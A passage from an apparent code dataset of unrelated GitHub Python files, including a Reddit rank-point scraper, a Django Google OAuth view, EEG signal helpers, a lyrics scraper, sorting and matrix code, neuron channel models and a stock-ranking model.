requests.get(url)\r\n print(request)\r\n if repr(request) == '': # Success\r\n responseSuccess = True\r\n json_response = request.json()\r\n else: # Failed, probably timed out or smth\r\n print('Retrying...')\r\n return json_response\r\n\r\nclass Interact:\r\n def __init__(self, interactId, interactType, rp):\r\n self.interactId = interactId\r\n self.interactType = interactType\r\n self.rp = rp\r\n\r\n# first one for profile calls, second one for attacks\r\nreg = ['[🥇🥈🥉🏅] Rank: ([ABCDESX]+) \\(-?((\\d+,\\d+)|\\d+) Rank Points\\)', '🏅 [+-](.\\d+) RP']\r\n\r\nwith open('rp.txt', 'w') as f:\r\n before = round(time()) # Start searching from current time\r\n calls = 0 # number of calls\r\n players = {} # dict of players\r\n seasonStart = 1675278000 # 19:00 Feb 1 2023 GMT\r\n searching = True\r\n\r\n while searching:\r\n interactString = ''\r\n interactList = {}\r\n url = f\"https://api.pushshift.io/reddit/search/comment/?author=KickOpenTheDoorBot&before={before}&size=500\"\r\n\r\n # Getting bot comments\r\n json_response = getRequest(url)\r\n\r\n # Processing all bot comments \r\n for comment in json_response['data']:\r\n if comment['stickied'] == True: pass\r\n if before <= seasonStart:\r\n searching = False\r\n break\r\n try:\r\n interactString += f\"{base36encode(comment['parent_id'])},\"\r\n if 'Rank:' in comment['body']: # profile call\r\n rp = int(re.search(reg[0], comment['body']).group().split(' ')[3].replace('(', '').replace(',', '')) # get RP in profile call\r\n interactList.update({base36encode(comment['parent_id']): Interact(comment['id'], 'profile', rp)})\r\n elif 'Damage Breakdown' in comment['body']: # attack\r\n rp = int(re.search(reg[1], comment['body']).group().split(' ')[1].replace('+', '')) # get gained RP in attack\r\n interactList.update({base36encode(comment['parent_id']): Interact(comment['id'], 'attack', rp)})\r\n else: # something else\r\n interactList.update({base36encode(comment['parent_id']): Interact(comment['id'], 'other', 0)})\r\n except TypeError: pass\r\n before = comment['created_utc']\r\n beforestamp = comment['utc_datetime_str']\r\n\r\n # Getting player interacts from bot comments\r\n url = f\"https://api.pushshift.io/reddit/search/comment/?ids={interactString[:-1]}&size=500\"\r\n json_response = getRequest(url)\r\n\r\n # Processing player interacts\r\n # Every player gets an entry in the players variable. Key is player name, value is array of every interact they've made\r\n for comment in json_response['data']:\r\n interactHistory = players.get(comment['author'], [])\r\n interactHistory.append(interactList[comment['id']])\r\n newdict = {comment['author']: interactHistory}\r\n players.update(newdict)\r\n\r\n # Progress check\r\n calls += 1\r\n print(f'{calls} calls done, currently searching {beforestamp}')\r\n\r\n for player in players:\r\n interactHistory = players.get(player)\r\n \r\n # Finding most recent profile call\r\n lastProfile = len(interactHistory) - 1\r\n for index, value in enumerate(interactHistory):\r\n if value.interactType == 'profile':\r\n lastProfile = index\r\n break\r\n\r\n # Summing up gained RP since most recent profile\r\n rp = 0\r\n for i in range(lastProfile + 1):\r\n rp += interactHistory[i].rp\r\n\r\n # Writing result to file \r\n f.write(f'{player}, {rp}\\n')\r\n","repo_name":"thedoorgoesboom/kotd-rp-tracker","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21225551154","text":"from django.shortcuts import render,redirect\nfrom oauth_backend import OauthBackend\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom django.http import Http404\nfrom django.utils.crypto import get_random_string\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom tukey.models import UnregisteredUser\nimport urllib,json,requests\nfrom openstack_auth.exceptions import KeystoneAuthException\nbackend=OauthBackend()\n\n\n\ndef index(request):\n '''\n Login entry for google oauth2.0, an antiforgery token is created \n and user is redirected to google oauth endpoint\n '''\n state=get_random_string(length=32)\n parameters=settings.OAUTH['parameters'].copy()\n parameters['state']=state\n request.session['oauth_state']=state\n request.session['next']=request.GET.get('next','/project')\n return redirect(settings.OAUTH['auth_uri']+\"?\"+\\\n urllib.urlencode(parameters))\n\n\ndef oauth2callback(request):\n '''\n Endpoint for google oauth2.0 callback, the antiforgery token is checked,\n then tukey talk to google using the code in the request, and exchange user\n information from google, user email is extracted from id_token\n '''\n if request.session.get('oauth_state','')==request.GET['state']:\n token=backend.getToken(request.GET.get('code',''))\n if token.has_key('id_token'):\n email=backend.decode(token['id_token'])\n else:\n return render(request,'403.html',{},status=403)\n try:\n user=authenticate(password=settings.TUKEY_PASSWORD,username='openid %s' % email,\\\n auth_url=settings.OPENSTACK_KEYSTONE_URL,request=request)\n user.identifier=email\n if user!=None and user.is_active:\n login(request,user)\n return redirect(request.session.get('next','/project'))\n \n #create unregistered user if user is not authorized in keystone,\n #and redirect user to apply page\n except KeystoneAuthException:\n user=UnregisteredUser('OpenId',email)\n from tukey.webforms.views import osdc_apply\n return osdc_apply(request, user)\n\n else:\n return render(request,'403.html',{},status=403)\n\n\n","repo_name":"Li-Ko/tukey_portal","sub_path":"tukey/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41518994544","text":"import hashlib\n\n\ndef encrypt_str(word):\n \"\"\"\n The function takes a string and returns an hashtext using SHA-2 encryption algorithm\n \"\"\"\n result = hashlib.sha256(word.encode())\n print(result.hexdigest())\n\n\nencrypt_str(word=\"With a method like this\")\n","repo_name":"thepsalmist/internitel","sub_path":"qn3/sha-2.py","file_name":"sha-2.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71897547345","text":"# Matrix multiplication\n# Write two functions that each multiply two square matrices,\n# one without using the built-in numpy functions and the other - using numpy.\n# The first problem is inputted with lists of size, each with size elements.\n# The second task is fed with objects of type np.ndarray --- square matrices of the same size.\n\n# The first function should return a list of lists and the second function should return np.array.\n\nfrom typing import List\nimport numpy as np\n\ndef no_numpy_mult(first, second):\n \"\"\"\n param first: list of \"size\" lists, each contains \"size\" floats\n param second: list of \"size\" lists, each contains \"size\" floats\n \"\"\"\n # Find the length of the first list (the height of the matrix)\n new_matrix_rows = len(first)\n\n # Find the length of the first element of the second list (the width of the matrix)\n new_matrix_columns = len(second[0])\n\n new_matrix = [[0 for _ in range(new_matrix_columns)] for _ in range(new_matrix_rows)]\n\n for i in range(new_matrix_rows):\n for j in range(new_matrix_columns):\n current_cell_sum_cumulative = 0\n for r in range(len(second)):\n current_cell_sum_cumulative += first[i][r] * second[r][j]\n\n new_matrix[i][j] = current_cell_sum_cumulative\n\n\n return new_matrix\n\ndef numpy_mult(first, second):\n \"\"\"\n param first: np.array[size, size]\n param second: np.array[size, size]\n \"\"\"\n\n #YOUR CODE: please use numpy\n\n result = np.matmul(first, second)\n return result\n\n\na = no_numpy_mult([[2, -3, 1], [5, 4, -2]], [[-7, 5], [2, -1], [4, 3]])\nprint(a)\n\nb = numpy_mult(np.array([[2, -3, 1], [5, 4, -2]]), np.array([[-7, 5], [2, -1], [4, 3]]))\nprint(b)\n\n# [[-16 16]\n# [-35 15]]\n","repo_name":"ArkadiyShuvaev/StepikDeepLearningBaseCourse","sub_path":"3. numpy/exercises/6.1.6 mutrix-multiplication.py","file_name":"6.1.6 mutrix-multiplication.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30133305775","text":"############################################################################JEJUS############################\r\n# [O2U.py] #\r\n# #\r\n# Function : \"O2U.py\" is a header file for EEG signal processing in \"Python Scripting\" Box. #\r\n# There exist the basic methods which are used in a main script for the signal processing. #\r\n# You can try to process the EEG signal in the various ways by adding a method that you want #\r\n# to use in this header file. #\r\n# #\r\n# --------------------------------------------------------------------------------------------------------- #\r\n# #\r\n# Author: # \r\n# Seongjoon Jeong (jdd01299@naver.com) #\r\n# Brain-Computer Interface (BCI) Lab. #\r\n# School of Computer Science and Electrical Engineering, #\r\n# Handong Global University, Pohang, Korea #\r\n# #\r\n# #\r\n# Histroy: (1.0) 2018.12.08 by Seongjoon Jeong #\r\n# #\r\n#############################################################################################################\r\n\r\nimport numpy\r\nimport math\r\n\r\n\r\n### The Methods for Signal Processing ###\r\n\r\n\r\n# 1. stimInputCheck(...) ( Output : result{=bool} )\r\n# : To check that the interested stimulation's input is coming in.\r\ndef stimInputCheck(input, OVStimulationSet, index, identifier): \r\n result = False\r\n for chunkIndex in range( len(input[index]) ):\r\n chunk = input[index].pop()\r\n if(type(chunk) == OVStimulationSet):\r\n for stimIdx in range(len(chunk)):\r\n stim=chunk.pop();\r\n # print('Received stim: ', stim.identifier, 'stamped at', stim.date, 's')\r\n if(stim.identifier == identifier):\r\n result = True\r\n \r\n return result\r\n\r\n\r\n\r\n# 2. readClassifierTxt(...) ( Output : classifier[1*numOfClass] )\r\n# : To read a classifier from a text file which is generated during the training time.\r\ndef readClassifierTxt(filename):\r\n f = open(filename)\r\n lines = f.readlines()\r\n classifier = lines[len(lines)-1]\r\n classifier = classifier[1:len(classifier)-2]\r\n classifier = classifier.split(', ')\r\n classifier = map(float, classifier)\r\n f.close()\r\n \r\n return classifier\r\n\r\n\r\n\r\n# 3. returnMeanOfAll(...) ( Output : mean{=float} )\r\n# : To retrun a mean of the raw data in all chennels.\r\ndef returnMeanOfAll(rawData, dimensionSizes): # rawData = 1D array [1 * signals] \r\n rawData2D = numpy.array(rawData).reshape(tuple(dimensionSizes)) # rawData2D = 2D array [channels * signals]\r\n rawData2D = rawData2D.mean(axis=0) # rawData2D = 2D array [channels * 1] (Only one value per channel)\r\n mean = (numpy.mean(rawData2D)) # mean = float [1*1]\r\n return mean\r\n\r\n\r\n\r\n# 4. makeDevClassifierTxt(...) ( Output : classifier[1*numOfClass] )\r\n# : To make a text file that has a classifier, which is generated by using an array of means and its standard deviation,\r\n# or return the classifier.\r\ndef makeDevClassifierTxt(meanArr, filename, numOfClass):\r\n lines =[]\r\n classifier = [0] * numOfClass\r\n \r\n f = open(filename, 'w')\r\n lines.append('---meanArr ( len=' + str(len(meanArr)) + ' )---\\n')\r\n lines.append(str(meanArr) + '\\n')\r\n \r\n N=len(meanArr)\r\n sumM=0 \r\n sumV=0\r\n\r\n # Average\r\n for i in range(0,N):\r\n sumM += meanArr[i]\r\n avg = sumM/N\r\n \r\n # Variance\r\n for i in range(0,N):\r\n sumV += math.pow(meanArr[i]-avg, 2)\r\n myVar = sumV/(N-1)\r\n \r\n # Deviation\r\n myDev = math.sqrt(myVar)\r\n lines.append('- Average: ' + str(avg) + '\\n')\r\n lines.append('- Variance: ' + str(myVar) + '\\n')\r\n lines.append('- Deviation: ' + str(myDev) + '\\n')\r\n \r\n # To make the classifier based uisng the deviation. \r\n # If you want to change the interval of the classifiers, you can change it by editting this follow part.\r\n for i in range(len(classifier)):\r\n classifier[i] = avg + (myDev * (-0.4 + (i * 0.4))) \r\n\r\n lines.append('---Classifier ( ' + str(numOfClass) + 'classes)---\\n')\r\n lines.append(str(classifier) + '\\n')\r\n f.writelines(lines)\r\n f.close()\r\n \r\n return classifier\r\n\r\n\r\n\r\n# 5. determineClass(...) ( Output : classNum{=Int} )\r\n# : To determine a class among N+1 classes.\r\ndef determineClass(classifier, mean):\r\n for i in range(len(classifier)-1):\r\n if classifier[i] <= mean < classifier[i+1]: # Among 1 ~ N-1\r\n classNum = i+1\r\n if classifier[0] > mean:\r\n classNum = 0 # Default state, 0\r\n if classifier[len(classifier)-1] <= mean:\r\n classNum = len(classifier) # Maximum state, N\r\n\r\n return classNum\r\n\r\n\r\n\r\n# 6. applyWindowSize(...) ( Output : previousMeansArr[1*?], mean{=float} )\r\n# : To apply the fixed window size.\r\ndef applyWindowSize(previousMeansArr, mean):\r\n # Update the 'previousMeansArr' using a current mean.\r\n previousMeansArr.pop()\r\n previousMeansArr.insert(0, mean)\r\n \r\n # Also, compute a new mean using the array for the fixed window size.\r\n mean = sum(previousMeansArr)/len(previousMeansArr)\r\n\r\n return previousMeansArr, mean\r\n\r\n# 7. readConfigFile(...) ( Output : classifier[1*numOfClass] )\r\n# : To read a classifier from a text file which is generated during the training time.\r\ndef readConfigFile(filename):\r\n f = open(filename)\r\n while True:\r\n line = f.readline()\r\n if not line: break\r\n\r\n if line[0] == 'O':\r\n tokens = line.split(' ')\r\n tokens[1] = tokens[1][0:len(tokens[1])-1]\r\n if tokens[0] == 'O2U_FILE_NAME':\r\n filename = tokens[1]\r\n elif tokens[0] == 'O2U_TRAINING_TIME':\r\n trainingTime = int(tokens[1])\r\n elif tokens[0] == 'O2U_ClASS_NUMBER':\r\n classNum = int(tokens[1]) \r\n \r\n f.close()\r\n\r\n return filename, trainingTime, classNum\r\n","repo_name":"AhnBCILab/Openvibe2Unity","sub_path":"Openvibe Settings/Python example scripts/Lib/O2U.py","file_name":"O2U.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37654379066","text":"#-*- coding: UTF-8 -*-\n'''\nScraper for http://newlyrics.gomtv.com/\n\nedge\n'''\n\nimport sys\nimport hashlib\nimport requests\nimport urllib.parse\nimport re\nimport unicodedata\nfrom lib.utils import *\nfrom lib.audiofile import AudioFile\n\n__title__ = 'GomAudio'\n__priority__ = '110'\n__lrc__ = True\n\n\nGOM_URL = 'http://newlyrics.gomtv.com/cgi-bin/lyrics.cgi?cmd=find_get_lyrics&file_key=%s&title=%s&artist=%s&from=gomaudio_local'\n\ndef remove_accents(data):\n nfkd_data = unicodedata.normalize('NFKD', data)\n return u\"\".join([c for c in nfkd_data if not unicodedata.combining(c)])\n\n\nclass gomClient(object):\n '''\n privide Gom specific function, such as key from mp3\n '''\n @staticmethod\n def GetKeyFromFile(file):\n musf = AudioFile()\n musf.Open(file)\n buf = musf.ReadAudioStream(100*1024)\t# 100KB from audio data\n musf.Close()\n # buffer will be empty for streaming audio\n if not buf:\n return\n # calculate hashkey\n m = hashlib.md5()\n m.update(buf)\n return m.hexdigest()\n\n @staticmethod\n def mSecConv(msec):\n s,ms = divmod(msec/10,100)\n m,s = divmod(s,60)\n return m,s,ms\n\nclass LyricsFetcher:\n def __init__(self, *args, **kwargs):\n self.DEBUG = kwargs['debug']\n self.settings = kwargs['settings']\n self.base_url = 'http://newlyrics.gomtv.com/'\n\n def get_lyrics(self, song, key=None, ext=None):\n log('%s: searching lyrics for %s - %s' % (__title__, song.artist, song.title), debug=self.DEBUG)\n lyrics = Lyrics(settings=self.settings)\n lyrics.song = song\n lyrics.source = __title__\n lyrics.lrc = __lrc__\n try:\n if not ext:\n ext = os.path.splitext(song.filepath)[1].lower()\n sup_ext = ['.mp3', '.ogg', '.wma', '.flac', '.ape', '.wav']\n if ext in sup_ext and key == None:\n key = gomClient.GetKeyFromFile(song.filepath)\n if not key:\n return None\n url = GOM_URL %(key, urllib.parse.quote(remove_accents(song.title).encode('euc-kr')), urllib.parse.quote(remove_accents(song.artist).encode('euc-kr')))\n response = requests.get(url, timeout=10)\n response.encoding = 'euc-kr'\n Page = response.text\n except:\n log('%s: %s::%s (%d) [%s]' % (\n __title__, self.__class__.__name__,\n sys.exc_info()[2].tb_frame.f_code.co_name,\n sys.exc_info()[2].tb_lineno,\n sys.exc_info()[1]\n ), debug=self.DEBUG)\n return None\n if Page[:Page.find('>')+1] != '':\n return None\n syncs = re.compile('([^<]*)').findall(Page)\n lyrline = []\n lyrline.append('[ti:%s]' %song.title)\n lyrline.append('[ar:%s]' %song.artist)\n for sync in syncs:\n # timeformat conversion\n t = '%02d:%02d.%02d' % gomClient.mSecConv(int(sync[0]))\n # unescape string\n try:\n s = sync[1].replace(''',\"'\").replace('"','\"')\n lyrline.append('[%s]%s' %(t,s))\n except:\n pass\n lyrics.lyrics = '\\n'.join(lyrline)\n return lyrics\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/script.cu.lrclyrics/lib/broken-scrapers/gomaudio/lyricsScraper.py","file_name":"lyricsScraper.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"16825633679","text":"import json\nfrom typing import Any, Dict, Optional, cast\n\nfrom httpx import Headers, Response\n\nMAX_CONTENT = 200\n\n\nclass ApiException(Exception):\n \"\"\"Base class\"\"\"\n\n\nclass UnexpectedResponse(ApiException):\n def __init__(self, status_code: Optional[int], reason_phrase: str, content: bytes, headers: Headers) -> None:\n self.status_code = status_code\n self.reason_phrase = reason_phrase\n self.content = content\n self.headers = headers\n\n @staticmethod\n def for_response(response: Response) -> \"ApiException\":\n return UnexpectedResponse(\n status_code=response.status_code,\n reason_phrase=response.reason_phrase,\n content=response.content,\n headers=response.headers,\n )\n\n def __str__(self) -> str:\n status_code_str = f\"{self.status_code}\" if self.status_code is not None else \"\"\n if self.reason_phrase == \"\" and self.status_code is not None:\n reason_phrase_str = \"(Unrecognized Status Code)\"\n else:\n reason_phrase_str = f\"({self.reason_phrase})\"\n status_str = f\"{status_code_str} {reason_phrase_str}\".strip()\n short_content = self.content if len(self.content) <= MAX_CONTENT else self.content[: MAX_CONTENT - 3] + b\" ...\"\n raw_content_str = f\"Raw response content:\\n{short_content!r}\"\n return f\"Unexpected Response: {status_str}\\n{raw_content_str}\"\n\n def structured(self) -> Dict[str, Any]:\n return cast(Dict[str, Any], json.loads(self.content))\n\n\nclass ResponseHandlingException(ApiException):\n def __init__(self, source: Exception):\n self.source = source\n","repo_name":"kdeyev/SeisSpark","sub_path":"src/seisspark_client/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"1424148970","text":"def merge_sort(arr):\n\n n = len(arr)\n print(f'Merge sorting {arr}')\n if n > 1:\n\n mid = n // 2\n\n left = arr[:mid]\n right = arr[mid:]\n \n print(f'Breaking apart into {left} and {right}')\n\n merge_sort(left)\n merge_sort(right)\n\n i = 0\n j = 0\n k = 0\n\n while i < len(left) and j < len(right):\n\n if left[i] <= right[j]:\n arr[k] = left[i]\n print(f'since {left[i]} is smaller than {right[j]} we will add that to the next value in the list giving us {arr}')\n i += 1\n\n else:\n arr[k] = right[j]\n print(f'since {right[j]} is smaller than {left[i]} we will add that to the next value in the list giving us {arr}')\n j += 1\n k += 1\n\n if i == len(left):\n print('Since we finished with left now we need to add the rest of right')\n while j< len(right):\n arr[k] = right[j]\n k += 1\n j += 1\n else:\n print('Since we finished with left now we need to add the rest of right')\n while i < len(left):\n arr[k] = left[i]\n k += 1\n i += 1\n \n print(f'Ourproduct: {arr}')\n \n return arr\n\nunsorted_arr = [8,4,23,42,16,15]\n\nmerge_sort(unsorted_arr)\n","repo_name":"wildwoodwaltz/data-structures-and-algorithms","sub_path":"sorting/merge/merge_sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15208822627","text":"#Author: Anal Kumar\n#Defines the channel kinetics\n\nimport moose\nimport rdesigneur as rd\nimport numpy as np\nimport csv\n\nSOMA_A = 4*np.pi*0.5e-6**2\nF = 96485.3329\nR = 8.314\nTemp = 307.15\ndt = 0.05e-3\nENa = 0.055\nEK = -0.075 #EK for KDR is set to -0.077\nECa = 0.50\nEm = -0.045\nVmin = -0.100\nVmax = 0.100\nVdivs = 3000\ndV = (Vmax-Vmin)/Vdivs\nCamin = 0\nCamax = 3e-3\nCadivs = 3000\ndCa = (Camax-Camin)/Cadivs\n\n\ndef Na_SChan(name):\n Na_S = moose.HHChannel( '/library/' + name )\n Na_S.Ek = ENa\n Na_S.Gbar = 300.0*SOMA_A\n Na_S.Gk = 0.0\n Na_S.Xpower = 3.0\n Na_S.Ypower = 1.0\n Na_S.Zpower = 1.0\n\n tha = -25e-3\n qa = 7.2e-3\n Ra = 0.4e3\n Rb = 0.124e3\n thi1 = -45e-3\n thi2 = -45e-3\n qd = 1.5e-3\n qg = 1.5e-3\n mmin=0.02\n hmin=0.5\n q10=3\n Rg = 0.01e3\n Rd = 0.03e3\n qq = 10e-3\n tq = -55e-3\n thinf = -50e-3\n qinf = 2e-3\n vhalfs=-60e-3\n a0s=0.0003e3\n zetas=12\n gms = 0.2\n smax=10e-3\n vvh=-58e-3\n vvs=2e-3\n ar2=1\n celsius = 34\n\n v = np.arange(Vmin,Vmax+dV, dV)\n alpv = 1/(1+np.exp((v-vvh)/vvs))\n alps = np.exp(zetas*(v-vhalfs)*9.648e4/(8.315*(273.16+celsius)))\n bets = np.exp(zetas*gms*(v-vhalfs)*9.648e4/(8.315*(273.16+celsius)))\n qt=q10**((celsius-24)/10)\n\n a = Ra * (v - tha) / (1 - np.exp(-(v - tha)/qa))\n a[abs(v-tha)<=1e-9] = Ra*qa\n b = Rb * (-v + tha) / (1 - np.exp(-(-v + tha)/qa))\n b[abs(v-tha)<=1e-9] = Rb*qa\n mtau = 1e-3/(a+b)/qt\n mtau[mtau pre[j]:\n auc += 1\n elif pre[i] == pre[j]:\n auc += 0.5\nauc = auc * 1.0 / (len(pos)*len(neg))\nprint(auc)","repo_name":"hcy700/train","sub_path":"auc.py","file_name":"auc.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12915522453","text":"# -*- coding: UTF-8 -*-\n\nfrom sklearn.metrics import classification_report\n\nimport itertools\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\n \n\n \n\n#將繪制圖表的部份程式碼整理程一個函式,方便調用:\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n\n\ndef main():\n y_predict = m.predict(X_test, batch_size=None, verbose=0, steps=None)\n\n y_pred = convert_to_labels(y_predict)\n y_true = convert_to_labels(y_test)\n target_names = [ 'Hunger','Sleepy' ,'Diaper','Painful']\n print (\"month = \" + str(month))\n print(classification_report(y_true, y_pred, target_names=target_names))\n print (\"**************************************************************\")\n\n plt.figure()\n cnf_matrix = confusion_matrix(y_true, y_pred)\n plot_confusion_matrix(cnf_matrix, classes=target_names,normalize=True,\n title=\"month = \" + str(month) + ' confusion matrix')\n\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"khsthomas/Blog-samples","sub_path":"deeplearning/analysis/plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"36681562015","text":"import sys\nsys.stdout = open(\"02 A Layer of Neurons.txt\", \"w\")\n\ninputs = [1, 2, 3, 2.5]\nprint(\"Inputs :\", inputs, \"\\n\")\n\nweights1 = [0.20, 0.80, -0.5, 10]\nweights2 = [0.50, -0.91, 0.26, -0.50]\nweights3 = [-0.26, -0.27, 0.17, 0.87]\nprint(f\"We have 3 neurons so we have 3 sets/lists of weights and for {len(inputs)} inputs :\", \"\\n\")\nprint(\"Weights for 1st neuron :\", weights1, \"\\n\")\nprint(\"Weights for 2nd neuron :\", weights2, \"\\n\")\nprint(\"Weights for 3rd neuron :\", weights3, \"\\n\")\n\nbias1 = 2\nbias2 = 3\nbias3 = 0.5\nprint(\"Similarly, 3 bias, 1 for each neuron :\", \"\\n\")\nprint(\"Bias for 1st neuron :\", bias1, \"\\n\")\nprint(\"Bias for 2nd neuron :\", bias2, \"\\n\")\nprint(\"Bias for 3rd neuron :\", bias3, \"\\n\")\n\noutput = ((inputs[0]*weights1[0] + inputs[1]*weights1[1] + inputs[2]*weights1[2] + inputs[3]*weights1[3] + bias1),\n (inputs[0]*weights2[0] + inputs[1]*weights2[1] + inputs[2]*weights2[2] + inputs[3]*weights2[3] + bias2),\n (inputs[0]*weights3[0] + inputs[1]*weights3[1] + inputs[2]*weights3[2] + inputs[3]*weights3[3] + bias3))\nprint(\"Layer output :\", output, \"\\n\")\n\nprint(\"In the above code, we have three sets of weights and three biases, which define three neurons. Each neuron is “connected” to the same inputs. \\n\"\n \"The difference is in the separate weights and bias that each neuron applies to the input. This is called a fully connected neural \\n\"\n \"network — every neuron in the current layer has connections to every neuron from the previous layer. This is a very common type of neural network, \\n\"\n \"but it should be noted that there is no requirement to fully connect everything like this.\\n\")\n\n# Let's write a similar function to our previous exercise to calculate output of a layer of neurons\ndef layer_output(inputs, weights, biases):\n layer_output = []\n for neuron_weights, neuron_bias in zip(weights, biases):\n neuron_output = 0\n for neuron_input, weight in zip(inputs, neuron_weights):\n neuron_output += neuron_input*weight\n neuron_output += neuron_bias\n layer_output.append(neuron_output)\n return layer_output\n\nLayer_Output = layer_output(inputs, [weights1, weights2, weights3], [bias1, bias2, bias3])\nprint(\"Layer Output using a function:\", Layer_Output, \"\\n\")\n\nsys.stdout.close()\n","repo_name":"srimanikantaarjun/Neural-Networks-from-Scratch","sub_path":"Coding_Our_First_Neurons/02 A Layer of Neurons.py","file_name":"02 A Layer of Neurons.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33945251042","text":"from .constants import *\nimport os\n\n\ndef indexOf(string, target, idx=0):\n try:\n return string.index(target, idx)\n except ValueError:\n return -1\n\n\ndef getLastEdit(path):\n try:\n return os.path.getmtime(path)\n except:\n return 0\n\n\ndef listdir(path):\n try:\n return sorted(\n [os.path.join(path, d) for d in os.listdir(path)],\n key = getLastEdit, reverse = True\n )\n except:\n return []\n\n\ndef FindLoLPath():\n for i in range(26):\n rootChr = chr(65+i)\n print(rootChr)\n if not os.path.exists(f\"{rootChr}:\\\\\"): continue\n\n now = []\n nxt = []\n for child in listdir(f\"{rootChr}:\\\\\"):\n if os.path.isdir(child):\n now.append(child)\n\n while(len(now) != 0):\n for path in now:\n if (LOL_PATH_TARGET1 in path) or (LOL_PATH_TARGET2 in path):\n return path\n\n for child in listdir(path):\n if os.path.isdir(child):\n nxt.append(child)\n\n now = nxt\n nxt = []\n return \"\"\n","repo_name":"LeeFuuChang/LoL-Check","sub_path":"interface/modules/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5261834925","text":"# declare a mapping and the models used\n\nfrom __future__ import print_function\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Date, String, Float, Integer\n\nBase = declarative_base()\n\n\nclass Stock(Base):\n __tablename__ = 'stocks'\n date = Column(Date, primary_key = True)\n code = Column(String, primary_key = True)\n ey = Column(Float)\n roc = Column(Float)\n pe = Column(Float)\n roe = Column(Float)\n pc = Column(Float)\n\n ey_order = Column(Integer)\n roc_order = Column(Integer)\n gb_eyroc_order = Column(Integer)\n\n pe_order = Column(Integer)\n roe_order = Column(Integer)\n gb_peroe_order = Column(Integer)\n\n sector = []\n @classmethod\n def add(cls, self):\n cls.sector.append(self)\n\n def __repr__(self):\n return '' % (self.code)\n\n ######## P/E and ROE class methods #######\n # sort from low to high\n @classmethod\n def sort_pe(cls):\n # | pe |\n # | pe_ok | pe_rotten |\n # 0------->----------->\n # + -\n\n pe_ok = []\n pe_rotten = []\n\n for s in cls.sector:\n if s._pe >= 0:\n pe_ok.append(s)\n else:\n pe_rotten.append(s)\n\n pe_ok.sort(key=lambda s: s._pe)\n pe_rotten.sort(key=lambda s: s._pe, reverse=True)\n pe = pe_ok + pe_rotten\n\n for i, s in enumerate(pe, start=1):\n s.pe_order = i\n\n # sort from high to low\n @classmethod\n def sort_roe(cls):\n # | roe |\n # | roe_ok | roe_rotten |\n # <--------0------------>\n # + -\n\n roe_ok = []\n roe_rotten = []\n\n for s in cls.sector:\n if s._roe >= 0:\n roe_ok.append(s)\n else:\n roe_rotten.append(s)\n\n roe_ok.sort(key=lambda s: s._roe, reverse=True)\n roe_rotten.sort(key=lambda s: s._roe, reverse=True)\n roe = roe_ok + roe_rotten\n\n for i, s in enumerate(roe, start=1):\n s.roe_order = i\n\n # sort from low to high\n @classmethod\n def sort_gb_peroe(cls):\n # | greenblatt |\n # 0------------>\n # +\n\n for s in cls.sector:\n s.gb_peroe_order = s.pe_order + s.roe_order\n\n cls.sector.sort(key=lambda s: s.gb_peroe_order)\n\n ######## EY and ROC class methods #######\n # ey\n @classmethod\n def sort_ey(cls):\n ey = []\n\n for s in cls.sector:\n ey.append(s)\n\n ey.sort(key=lambda s: s._ey, reverse=True)\n\n for i, s in enumerate(ey, start=1):\n s.ey_order = i\n\n # roc\n @classmethod\n def sort_roc(cls):\n roc = []\n\n for s in cls.sector:\n roc.append(s)\n\n roc.sort(key=lambda s: s._roc, reverse=True)\n\n for i, s in enumerate(roc, 